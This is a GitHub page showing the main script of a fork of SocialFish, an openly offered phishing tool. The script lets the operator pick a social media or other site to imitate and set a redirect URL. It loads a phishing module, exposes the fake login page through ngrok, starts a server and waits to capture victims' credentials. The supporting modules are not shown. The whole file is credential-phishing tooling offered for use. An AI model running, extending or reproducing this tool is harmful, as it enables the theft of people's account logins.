forked from UndeadSec/SocialFish
-
Notifications
You must be signed in to change notification settings - Fork 0
/
SocialFish.py
57 lines (51 loc) · 1.76 KB
/
SocialFish.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
#!/usr/bin/env python3
######################################################
# #
# SOCIALFISH v2.0sharkNet #
# #
# by: UNDEADSEC #
# #
# Telegram Group: https://t.me/UndeadSec #
# YouTube Channel: https://youtube.com/c/UndeadSec #
# Twitter: https://twitter.com/A1S0N_ #
# #
######################################################
from sys import exit, version_info
if version_info<(3,0,0):
print('[!] Please use Python 3. $ python3 SocialFish.py')
exit(0)
from multiprocessing import Process
from core.view import *
from core.pre import *
from core.phishingRunner import *
from core.sites import site
def main():
head()
checkEd()
preoption = input(cyan("\n Select an option:\n\n [S] Social Media\n\n [O] Others\n\n SF > "))
if preoption.upper() == 'S':
for x in range(1, 8):
print(cyan('\n [' + str(x) + '] ' + site[str(x)]))
else:
for x in range(8, 12):
print(cyan('\n [' + str(x) + '] ' + site[str(x)]))
option = input(cyan('\n SF > '))
print(cyan("\n Insert a custom redirect url: "))
custom = input(cyan('\n SF > '))
if '://' in custom:
pass
else:
custom = 'http://' + custom
loadModule(site[option])
runPhishing(site[option], custom)
if __name__ == "__main__":
try:
pre()
main()
runNgrok()
Process(target=runServer).start()
waitCreds()
except KeyboardInterrupt:
system('pkill -f ngrok')
end()
exit(0)